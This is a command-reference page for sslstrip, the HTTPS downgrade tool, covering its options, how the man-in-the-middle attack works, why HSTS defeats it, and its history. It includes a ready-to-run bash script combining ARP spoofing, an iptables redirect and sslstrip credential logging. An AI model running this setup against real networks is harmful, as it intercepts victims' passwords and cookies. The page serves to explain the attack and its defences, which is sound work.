LinuxCommandLibrary

sslstrip

Downgrade HTTPS connections to HTTP

TLDR

Log only HTTPS POST traffic, listening on the default port 10000

$ sslstrip

Log only HTTPS POST traffic on port 8080
$ sslstrip --listen=[8080]

Log all SSL traffic to and from the server on port 8080
$ sslstrip --ssl --listen=[8080]

Log all SSL and HTTP traffic to and from the server on port 8080
$ sslstrip --listen=[8080] --all

Specify the file path to store the logs
$ sslstrip --listen=[8080] --write=[path/to/file]

Display help
$ sslstrip --help

SYNOPSIS

sslstrip [options]
sslstrip does not capture traffic itself: the victim's port-80 traffic has to be brought to its listening port, normally by ARP spoofing plus an iptables REDIRECT rule, and the port given to -l must be the one the rule redirects to.
Example: sslstrip -l 8080 -w stripped_data.log

PARAMETERS

-w <filename>, --write=<filename>
    Write the captured traffic to this file instead of the default sslstrip.log in the current directory.

-p, --post
    Log only the POST bodies of stripped HTTPS requests, i.e. submitted forms and credentials. This is the default.

-s, --ssl
    Log all traffic to and from the server on connections that were originally HTTPS, not only POSTs.

-a, --all
    Log everything sslstrip proxies, stripped HTTPS and plain HTTP alike.

-l <port>, --listen=<port>
    TCP port to listen on for the redirected HTTP traffic (default 10000). The iptables REDIRECT rule must send port-80 traffic to this port.

-f, --favicon
    Substitute a padlock favicon on responses that were stripped from HTTPS, imitating the secure-site indicator browsers showed at the time.

-k, --killsessions
    Kill sessions in progress: the first time a client is seen talking to a domain, sslstrip answers with a redirect that expires the client's cookies, so the victim has to log in again and the credentials pass through sslstrip.

-h, --help
    Print the usage message.

DESCRIPTION

sslstrip is a Python tool by Moxie Marlinspike for a man-in-the-middle attack that downgrades a victim's HTTPS sessions to HTTP. It does not break TLS; it sits on the plaintext side of the connection. The victim's browser talks HTTP to sslstrip, and sslstrip talks HTTPS to the real server, so the server sees a normal encrypted session while the victim's leg carries usernames, passwords, cookies and form contents in the clear. To keep the victim on the plaintext side, sslstrip rewrites each response on the way back: `https://` links in the HTML become `http://`, and a 302 redirect to an https URL is rewritten so the browser follows it over HTTP. It records every URL it has rewritten so that, when the victim later requests the http version, it knows to fetch the original over HTTPS. The attack therefore needs an initial plaintext request to hook: a hostname typed without a scheme, an `http://` link or a server-side redirect to HTTPS all provide one, whereas a connection the browser opens directly to port 443 never reaches sslstrip. Traffic is brought to sslstrip by ARP spoofing (`arpspoof`) and an `iptables` REDIRECT rule on port 80, not by sslstrip itself.

CAVEATS

sslstrip has not kept pace with browsers and servers: HSTS (HTTP Strict Transport Security, RFC 6797) was designed against exactly this downgrade, and browser UI now flags plaintext pages rather than relying on the user to notice a missing padlock.

HSTS: a site that sends a `Strict-Transport-Security` header tells the browser to reach it only over HTTPS for `max-age` seconds, whether the user typed `http://`, followed an `http://` link or received a redirect. The browser rewrites such requests to HTTPS internally, so they never leave the machine as plaintext and sslstrip never sees them. What remains is the first visit, before the header has been cached, and even that window is closed for domains on the browsers' built-in HSTS preload list.

Browser indicators: sslstrip does not present a certificate to the victim, so it does not trigger certificate warnings; the downgraded page simply arrives as plain HTTP. In 2009 the only visible difference was a missing padlock, which the `-f` option papered over with a padlock favicon. Current browsers instead label every plain-HTTP page "Not secure" and warn on password fields, a signal sslstrip cannot suppress.

Legal implications: using sslstrip against networks or users without explicit authorization is illegal in most jurisdictions; confine it to lab networks and engagements with a written scope.
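
The rewrite described in DESCRIPTION and the HSTS check behind the first caveat, as an added shell illustration for this page (example code, not sslstrip's own source). The upstream response is constructed inline and the `example.test` host names are placeholders; `strip_response` performs the victim-facing rewrite, `stripped_urls` lists what must be re-upgraded to HTTPS on the server side, and `hsts_max_age` reads the header that makes a returning browser ignore the stripped link.

```bash
#!/usr/bin/env bash
# Added illustration for this page (not sslstrip's own code): the rewrite the
# DESCRIPTION describes, applied to a constructed upstream response, and the
# HSTS check that explains the CAVEATS. Host names are placeholders.

# Constructed sample: what the real server sent back to the attacker's proxy
# over HTTPS. The 302 to https://, the absolute https:// links and the HSTS
# header are the three things the attack has to care about.
SAMPLE_RESPONSE='HTTP/1.1 302 Found
Location: https://login.example.test/account
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Type: text/html

<a href="https://login.example.test/account">Sign in</a>
<img src="http://static.example.test/logo.png">
<form action="https://login.example.test/session" method="post">'

# strip_response: the victim-facing rewrite. Every https:// reference,
# including the Location header of the redirect, becomes http://, so the
# browser's next request is plaintext and lands on the attacker again.
strip_response() {
    sed 's#https://#http://#g'
}

# stripped_urls: the URLs the rewrite touched, one per line, deduplicated.
# sslstrip keeps a map of exactly this kind so that when the victim asks for
# the plaintext version it can fetch the original over HTTPS from the server.
stripped_urls() {
    grep -o 'https://[^"'"'"' <>]*' | sort -u
}

# hsts_max_age: print max-age from a Strict-Transport-Security header read
# from stdin, or 0 when the server sends none. A browser that has seen a
# non-zero value over HTTPS will not follow the stripped http:// link for that
# many seconds, which is why the attack fails against returning visitors.
hsts_max_age() {
    age=$(tr -d '\r' | grep -i '^strict-transport-security:' \
          | grep -io 'max-age=[0-9]*' | head -n 1 | cut -d= -f2) || true
    printf '%s\n' "${age:-0}"
}

printf '%s\n' "$SAMPLE_RESPONSE" | strip_response
printf 'URLs to re-upgrade on the server side:\n'
printf '%s\n' "$SAMPLE_RESPONSE" | stripped_urls
printf 'HSTS max-age: %s\n' "$(printf '%s\n' "$SAMPLE_RESPONSE" | hsts_max_age)"
```

Against a live target you own, `curl -sI https://host/ | hsts_max_age` answers the practical question before any spoofing is set up: a non-zero value means only first-time visitors (and no preloaded domain) can be downgraded.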

ENVIRONMENT SETUP FOR SSLSTRIP

For sslstrip to function, the victim's port-80 traffic must pass through the attacker's machine and be handed to sslstrip's listening port. This typically involves:
1. Enabling IP forwarding: `sysctl -w net.ipv4.ip_forward=1` turns routing on immediately; setting `net.ipv4.ip_forward = 1` in `/etc/sysctl.conf` and running `sysctl -p` makes it persistent. Without forwarding, the poisoned victim loses connectivity instead of being proxied.
2. ARP spoofing: `arpspoof` (from dsniff) or `ettercap` tells the victim that the attacker's MAC address belongs to the gateway and, in the other direction, tells the gateway the same about the victim, so both halves of the conversation transit the attacker.
3. iptables rules: a NAT rule redirects incoming HTTP (port 80) to sslstrip's listening port, e.g. `iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <port>`, where `<port>` is the value given to `-l` (10000 if `-l` was not used). Only port 80 is redirected: a connection the browser opens directly to 443 never reaches sslstrip, which is why the attack depends on the victim starting from a plaintext request. Delete the rule (`-D` with the same arguments) when finished.
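
The three steps above as one script that also undoes them on exit, added here as an example (not part of sslstrip or dsniff). Interface name, victim and gateway addresses and the log file name are placeholders for a lab network you own; `DRY_RUN=1` prints the privileged commands instead of executing them, which is how the helpers can be checked without root.

```bash
#!/usr/bin/env bash
# Added example for this page, not part of sslstrip or dsniff: the three setup
# steps as one script that also undoes them on exit. Interface and addresses
# are placeholders for a lab network you own (RFC 5737 documentation range).
# DRY_RUN=1 prints the privileged commands instead of executing them.
set -eu

IFACE="${IFACE:-eth0}"            # assumed interface facing the victim
VICTIM="${VICTIM:-192.0.2.10}"    # placeholder victim address
GATEWAY="${GATEWAY:-192.0.2.1}"   # placeholder gateway address
PORT="${PORT:-8080}"              # sslstrip -l and the REDIRECT target must agree
LOG="${LOG:-stripped_data.log}"

run() {
    # Execute a privileged command, or print it when DRY_RUN=1.
    if [ "${DRY_RUN:-0}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

enable_forwarding() { run sysctl -w net.ipv4.ip_forward=1; }

# -i restricts the rule to the victim-facing interface; PREROUTING only sees
# packets arriving from the network, so the attacker's own browsing is untouched.
add_redirect()    { run iptables -t nat -A PREROUTING -i "$IFACE" -p tcp --dport 80 -j REDIRECT --to-port "$PORT"; }
remove_redirect() { run iptables -t nat -D PREROUTING -i "$IFACE" -p tcp --dport 80 -j REDIRECT --to-port "$PORT"; }

start_spoof() {
    # Poison both ends so victim<->gateway traffic transits this host.
    run arpspoof -i "$IFACE" -t "$VICTIM" "$GATEWAY" &
    run arpspoof -i "$IFACE" -t "$GATEWAY" "$VICTIM" &
}

cleanup() {
    # arpspoof re-advertises the real MAC addresses when it receives SIGTERM,
    # so stopping it cleanly restores the victim's and gateway's ARP tables.
    run pkill -x arpspoof || true
    remove_redirect || true
    if [ "${PREV_FWD:-1}" = 0 ]; then run sysctl -w net.ipv4.ip_forward=0; fi
}

main() {
    PREV_FWD=$(sysctl -n net.ipv4.ip_forward 2>/dev/null || echo 1)
    trap cleanup EXIT
    trap 'exit 130' INT TERM
    enable_forwarding
    add_redirect
    start_spoof
    sleep 2   # let the poisoned ARP entries take effect before proxying
    # -a logs both stripped HTTPS and plain HTTP; -l must match the REDIRECT port.
    run sslstrip -a -l "$PORT" -w "$LOG"
}

# Define the helpers when sourced or run bare; start the attack only on "run".
if [ "${1:-}" = run ]; then main; fi
```

Run it as `sudo IFACE=eth0 VICTIM=... GATEWAY=... ./sslstrip-lab.sh run`; Ctrl-C stops sslstrip, and the EXIT trap removes the NAT rule, restores the forwarding setting and lets arpspoof repair the ARP entries it poisoned.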

HISTORY

sslstrip was released by Moxie Marlinspike at Black Hat DC in 2009. Its point was that the security of HTTPS depended on how the browser arrived at the HTTPS URL: as long as the first request was plaintext, an on-path attacker could keep the user on plaintext without ever touching TLS. HTTP Strict Transport Security (HSTS) was a direct response to that class of downgrade, followed by the HSTS preload list and, for a time, HPKP (HTTP Public Key Pinning, now deprecated). Against current browsers its direct effectiveness is limited, but it remains the reference example for understanding why HSTS exists and how a downgrade attack differs from breaking encryption.

SEE ALSO

arpspoof(8), ettercap(8), dsniff(8), mitmf(1)
